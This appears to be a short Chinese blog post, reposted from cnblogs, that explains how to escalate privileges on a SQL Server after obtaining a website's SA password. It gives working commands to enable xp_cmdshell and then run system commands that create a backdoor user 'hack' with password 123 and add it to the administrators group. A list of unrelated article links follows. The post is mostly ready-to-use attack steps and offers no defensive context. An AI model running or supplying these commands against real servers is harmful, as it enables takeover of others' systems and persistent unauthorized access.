SQLServer的XP_CmdShell提权

当我们拿到了某个网站SQLServer数据库的SA权限用户密码的话，我们就可以使用XP_CmdShell提权了。

开启xp_cmdshell

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

关闭xp_cmdshell

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell', 0;reconfigure

使用XP_CmdShell执行系统命令

exec master..xp_cmdshell 'net user hack 123 /add'    #添加用户hack，密码123
exec master..xp_cmdshell 'net localgroup administrators hack add'    #将hack用户添加到管理员组中

参考文章：【提权】MSSQL提权之xp_cmdshell

技术分享：MSSQL注入xp_cmdshell

实战SQL Server提权

查看全文

相关阅读:
PHP chgrp() 函数
 PHP basename() 函数
 PHP user_error() 函数
 PHP trigger_error() 函数
 my.cnf需要改的参数
 WPF 使用 Direct2D1 画图入门
 win10 uwp 如何开始写 uwp 程序
 win10 uwp 如何开始写 uwp 程序
 C# 快速释放内存的大数组
 C# 快速释放内存的大数组

原文地址：https://www.cnblogs.com/csnd/p/11807664.html